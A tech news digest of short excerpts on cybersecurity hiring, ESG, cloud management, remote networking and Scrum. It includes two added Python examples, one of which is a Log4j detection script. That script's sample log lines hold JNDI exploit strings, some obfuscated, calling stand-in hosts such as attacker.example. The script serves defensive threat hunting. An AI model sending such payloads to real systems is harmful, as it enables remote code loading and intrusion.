Daily Tech Digest - November 17, 2022

Why Cybersecurity Should Highlight Veteran-Hiring Programs

Veterans who did not work in cybersecurity while in the military still bring valuable skills to the field. The military emphasizes teamwork, adaptability, and responsibility, all traits that security professionals need to have. Military personnel are also trained in careful decision-making under extreme pressure using the available information. ... Earlier this year, the White House National Cyber Workforce and Education Summit issued a call to action to increase cybersecurity education and training opportunities. One of the announcements was to encourage more apprenticeship programs to help develop and train the cybersecurity workforce. In the months since, there have been a number of initiatives from cybersecurity organizations, including the SANS Institute. Many colleges and universities have specific training programs to give veterans hands-on experience in various areas. Cybersecurity training platform Cybrary said this week it is partnering with VetSec, a community of over 3,300 veterans working in or transitioning into cybersecurity, and TechVets, a bridge service for moving veterans, service leavers, reservists, and their families into IT careers.

ESG and C: Does Cybersecurity Deserve Its Own Pillar in ESG Frameworks?

Thefts of personal information during a cybersecurity breach erode trust on the part of customers, investors, employees and other stakeholders, demonstrating the link between cyber risk and social risk. The new disclosure and reporting requirements embedded in the Securities and Exchange Commission’s latest regulations governing the oversight of cybersecurity underline the link between governance risk and cyber risk. All this evidence shows that cybersecurity is already part of ESG and that, perhaps, a more appropriate abbreviation would be ESGC. Most enterprise risk management policies have already expanded their oversight from purely financial risk to these other areas, including cybersecurity. Cyber risk can be as harmful to a company’s reputation and value as any other ESG issue, and the damage is inflicted and experienced in much the same way. As cyberattacks increase in size and frequency, the direct and indirect damage to companies — including loss of customer confidence, reputational damage, potential impact on the stock price and possible regulatory actions or litigation — arguably touches all aspects of ESG.

Efficient data governance with AI segmentation

An effective and efficient technology is available to replace such archaic methods and reduce risk fast, at a fraction of the cost: artificial intelligence (AI) segmentation. With AI-based segmentation, we scan only a small statistical sample of files and from it learn which attributes of a file make it more likely to contain sensitive data. That gives us the information needed to prioritize the search for high-risk data. For example, are Word documents at higher risk than PowerPoint presentations? Is there a particular folder that is more likely to contain sensitive data? Once the riskiest data is highlighted, we can immediately start the full scan and remediation there, eliminating the highest risk as early in the process as possible. The remediation work is thereby ordered to achieve the greatest risk reduction in the least amount of time. Suppose, for example, that we hold a very large data estate and scan it in 100-terabyte chunks. Indexing or scanning a single 100-terabyte chunk can take several months, and working through every chunk takes far longer.
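The sample-then-prioritize idea above, worked through as an added example (this is not the article's or any vendor's code). It assumes two file attributes, extension and parent folder, a crude regex stand-in for the sensitive-data classifier, a constructed in-memory corpus of 60 files in place of a real share, and a fixed random seed so the run is reproducible; the paths, contents and the 40% sample fraction are all illustrative choices.

```python
import random
import re
from collections import defaultdict
from pathlib import PurePosixPath

# Added example, not code from the article: scan a small random sample,
# estimate per-attribute hit rates, then order the full scan by the
# expected number of sensitive files in each group.

SSN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
CARD = re.compile(r"\b(?:\d{4}[ -]?){3}\d{4}\b")


def looks_sensitive(text: str) -> bool:
    """Stand-in classifier: crude SSN / card-number patterns (assumption)."""
    return bool(SSN.search(text) or CARD.search(text))


def build_corpus() -> dict:
    """Constructed corpus (path -> content); a real run would read a file share."""
    files = {}
    for i in range(20):
        files[f"/shares/hr/record_{i}.docx"] = f"employee {i} ssn 123-45-{6000 + i}"
        files[f"/shares/marketing/deck_{i}.pptx"] = f"roadmap slide {i}"
        body = f"order {i} card 4111 1111 1111 1111" if i % 2 == 0 else f"order {i} shipped"
        files[f"/shares/sales/notes_{i}.txt"] = body
    return files


# Attributes we hypothesize might predict sensitive content.
ATTRIBUTES = {
    "extension": lambda p: PurePosixPath(p).suffix.lstrip("."),
    "folder": lambda p: str(PurePosixPath(p).parent),
}


def estimate(files, sample_fraction=0.4, seed=0):
    """Scan only a random sample; return {attr: {value: estimated hit rate}}."""
    paths = sorted(files)
    rng = random.Random(seed)                       # fixed seed keeps the demo reproducible
    sample = rng.sample(paths, round(len(paths) * sample_fraction))
    overall = sum(looks_sensitive(files[p]) for p in sample) / len(sample)
    rates = {}
    for attr, key in ATTRIBUTES.items():
        hits, seen = defaultdict(int), defaultdict(int)
        for p in sample:
            seen[key(p)] += 1
            hits[key(p)] += looks_sensitive(files[p])
        # groups the sample never touched fall back to the overall sample rate
        rates[attr] = {key(p): (hits[key(p)] / seen[key(p)] if seen[key(p)] else overall)
                       for p in paths}
    return rates


def rank(files, rates, attr):
    """Order groups by expected sensitive files (estimated rate x group size)."""
    key = ATTRIBUTES[attr]
    population = defaultdict(int)
    for p in files:
        population[key(p)] += 1
    return sorted(((v, rates[attr][v], rates[attr][v] * n) for v, n in population.items()),
                  key=lambda t: t[2], reverse=True)


def scan_in_order(files, attr, ranking):
    """Full scan, highest-priority group first; report cumulative progress."""
    key = ATTRIBUTES[attr]
    progress, scanned, found = [], 0, 0
    for value, _, _ in ranking:
        for p in files:
            if key(p) == value:
                scanned += 1
                found += looks_sensitive(files[p])
        progress.append((value, scanned, found))
    return progress


if __name__ == "__main__":
    corpus = build_corpus()
    rates = estimate(corpus)
    order = rank(corpus, rates, "extension")
    for value, rate, expected in order:
        print(f"{value:5} est. rate {rate:.2f} expected sensitive {expected:5.1f}")
    for value, scanned, found in scan_in_order(corpus, "extension", order):
        print(f"after {value:5}: scanned {scanned:3} found {found:3}")
```

The progress list is the point: after the first (highest-priority) group is fully scanned, most of the corpus's sensitive files have already been found and can be remediated, long before the low-priority groups are touched. Two caveats a practitioner should keep in mind: the estimate is only as good as the sample and the classifier behind it, and a low estimated rate is a reason to scan a group later, never a reason to skip it.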

What Makes a Good Cybersecurity Professional?

A cybersecurity professional is, at their core, an analytical person who looks at a problem from multiple points of view and devises an approach to solve the problem. When doing so, they must collaborate with people from different backgrounds and functions to understand the problem in depth and in context. This requires good communication skills, unlike some other technology-heavy roles in which a specification (spec) is provided and the task is strictly to achieve the spec. Someone could be an analyst, a risk advisor, a banker or a human resources (HR) professional and they could still be considered a cybersecurity professional. Cybersecurity relies on an understanding of human behavior and on contextual transactions in different lines of business. For example, a banker knows the pitfalls of processes when it comes to banking-related operations. They can bring this wealth of knowledge to cybersecurity operations by gaining the right skill set to build their technological capability. Imagine this to be a role where a consultant envisions the strategy and the solution and builds the technological stack required to solve the problem.

Agility, business more important than cost, network management for IT teams

Half of IT teams rated end-to-end visibility as a top priority, while just under that number said multicloud software-defined networks (SDNs) were on their most-wanted list. The bottom line in this area, said Cisco, was that although an unpredictable world challenges IT organisations, it also presents new opportunities for those that use technology to support dynamic business needs. It said IT needs to adopt an agile, cloud-like operations model for everything it does, including network operations. Cisco also remarked that as endpoints and applications become more dispersed and distributed, network complexity multiplies. While adoption of public cloud is growing, 50% of workloads are still deployed on-premises, and as a result, most environments will continue to be a mix of public cloud, hosted, private cloud, edge and on-premises environments, it said. CloudOps and NetOps figured highly in both operational and organisational trends and there was greater alignment between the objectives of both. In all, 49% of CloudOps and 42% of NetOps respondents said security was their top motivation for using multiple clouds, and both said business performance, security and agility were top priorities.

Networking for remote work puts the emphasis on people, not sites

Many companies had to support work-from-home (WFH) during COVID, and most looked forward to having their staff back in the office. Most now tell me that some or all of the staff isn’t coming back, and that remote work is a given for at least some positions, likely for a very long time. That’s opened major questions about how these now-forever-roaming workers are connected to information resources and to each other. Didn’t we solve this already, with Zoom and Teams? Sort of. Collaborative video applications provide a reasonable substitute for meetings, but you still have the challenge of application access and information delivery. A bit over 80% of enterprises I’ve talked with say they need to make a remote worker look like they’re at their desk, and they need to be able to work as though they were as well. During lockdown, most companies said they relied on sending files and documents to workers. A few used SD-WAN technology to connect workers’ homes to the company VPN. The former strategy is very limiting and inefficient; you can’t replace checking account status online by sending around documents.

5 ways to find hidden IT talent inside your organization

Nobody knows the hidden IT talents of non-IT employees better than their managers and co-workers. At TruStone, business leaders and managers are open to recognizing employees with IT potential that could benefit both the employee’s career and the company. “We’re transparent that this would be a great person for [an IT] career progression, so maybe they should come into IT,” Jeter says. Jeter often discovers talent through his team’s product management consults inside the organization. “With a lot of scaled agile framework, we have product owners that sit outside of IT but within the business in areas like consumer lending, member services, or mortgages. We have technologies to align with them and they orchestrate the backlog” and other supporting duties, Jeter says. “They see what IT does, and we see what they do — and some of them want to come into IT.” IT scored a new team member recently after a product owner in operations worked with IT on a product management consult. He had been with the company for nine years and worked in training before business operations.

Not patched Log4j yet? Assume attackers are in your network, say CISA and FBI

The ubiquitous nature of Apache Log4j means it's embedded in a vast array of applications, services and enterprise software tools that are written in Java and used by organizations around the world, many of which rushed to apply the fixes. But despite the urgent messaging around the need to apply critical security updates, there are still organizations that haven't done so – meaning they're still vulnerable to any cyber criminals or other malicious hackers looking to exploit Log4j. Now CISA and the FBI have warned organizations with affected VMware systems that didn't immediately apply patches or workarounds "to assume compromise and initiate threat hunting activities". The cybersecurity advisory (CSA) also warns any organizations that detect a compromise as a result of Log4j to "assume lateral movement" by the attackers, investigate any connected systems and audit accounts with high privilege access. "All organizations, regardless of identified evidence of compromise, should apply the recommendations in the mitigations section of this CSA to protect against similar malicious cyber activity," said the alert.
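A starting point for the threat hunting the advisory asks for, as an added example (this is not code from the advisory or the article): a pass over web server access logs for Log4j JNDI lookup strings, collapsing the common nested-lookup and URL-encoded obfuscations before matching. It assumes the well-known Log4j 2.x lookup syntax (`${jndi:...}`, `${lower:...}`, `${upper:...}` and `:-` defaults); the log lines, hostnames and addresses are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Added example, not from the CISA/FBI advisory or the article: hunt for
# Log4j JNDI lookup strings in access logs, including the nested-lookup and
# URL-encoded obfuscations commonly seen in exploitation attempts.

LOOKUP = re.compile(r"\$\{([^${}]*)\}")            # innermost ${...} with no nested lookup
JNDI = re.compile(r"\$\{jndi:(\w+):/*([^/}\s]+)", re.I)


def _resolve(match):
    """Collapse one innermost lookup the way Log4j 2.x evaluates it."""
    body = match.group(1)
    if ":-" in body:                          # ${env:NOPE:-j}, ${::-j}: the default value wins
        return body.split(":-", 1)[1]
    kind, sep, rest = body.partition(":")
    if sep and kind.lower() == "lower":       # ${lower:J} -> j
        return rest.lower()
    if sep and kind.lower() == "upper":       # ${upper:n} -> N
        return rest.upper()
    return match.group(0)                     # anything else, including ${jndi:...}, is kept


def normalize(s: str) -> str:
    """URL-decode once, then collapse nested lookups until nothing changes."""
    s = unquote(s)
    while True:
        collapsed = LOOKUP.sub(_resolve, s)
        if collapsed == s:
            return s
        s = collapsed


def hunt(lines):
    """Return one record per log line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append({"line": n, "protocol": m.group(1).lower(), "target": m.group(2)})
    return hits


# Constructed access-log lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Nov/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [17/Nov/2022:10:01:09 +0000] "GET /?x=${jndi:ldap://attacker.example:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '203.0.113.9 - - [17/Nov/2022:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}${env:NOPE:-d}ap://evil.example/x}"',
    '203.0.113.10 - - [17/Nov/2022:10:01:21 +0000] "GET /login?user=%24%7Bjndi%3Armi%3A%2F%2F10.0.0.5%3A1099%2Fobj%7D HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [17/Nov/2022:10:01:30 +0000] "GET /app.js?v=${build} HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi via {hit['protocol']} to {hit['target']}")
```

Three caveats. A hit records an attempt, not a successful exploit; the callback target is the lead to follow in proxy, DNS and firewall logs. The decoder handles a single layer of URL encoding and the lookup forms listed above, so double-encoded or otherwise wrapped payloads need their own handling. And, as the advisory says, no hits on an unpatched host proves nothing: the hunt should also cover outbound LDAP/RMI connections and unexpected child processes of the Java service, and any confirmed compromise should be treated as a lateral-movement investigation.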

Don’t get lost in the cloud: How to manage multiple providers

For organizations that take an ad hoc approach to multi-cloud, the risks include cost overruns from engaging several different services, Linthicum warns. “They don’t have a good handle on how the money’s being spent in a particular cloud provider, even within the primary provider,” he says. “And they’re getting huge cloud bills they didn’t expect, to the point that the boards of directors and CIOs and C-suites are starting to notice.” Security concerns are another reason to centralize cloud management. Organizations with three or four providers should have a security system that spans all of them so they can avoid juggling several separate dashboards, Linthicum suggests. “That’s where people get confused, and that’s how breaches occur.” Besides a plan for how the various providers work together, Linthicum says, it’s crucial to have a financial operations (FinOps) program that monitors and manages usage and costs. “Many enterprises don’t have that right now,” he notes. “They wait for their bill to show up and then figure out what went on, and they’re just running it on a spreadsheet where they’re not getting a true FinOps program in place.”

When, Why and How Facilitation Skills Help Scrum Teams

Stress levels run high when two vocal members of the team, Minal and Linda, clash during the Sprint Retrospective. Minal expresses her disappointment with how little progress the team made during the Sprint. She adds sarcastically that maybe it was because of how they decided to implement the work, which was originally Linda’s idea. Linda responds quickly in a defensive tone, and calls out that Minal is always quick to point out what’s wrong but doesn’t contribute many suggestions of her own. The Retrospective descends into a tense back and forth between them, and the Scrum Master, who is facilitating the Retrospective, firmly stops their argument. The Scrum Master moves the discussion to improvement ideas for the team, and many items around managing work in progress and exploring new technologies are suggested, but ultimately the team is stuck at an impasse over what to carry forward. The timebox ends and the Scrum Master calls an end to the Sprint Retrospective with no plans for the team on how to improve.

Quote for the day:

"Make heroes out of the employees who personify what you want to see in the organization." -- Anita Roddick
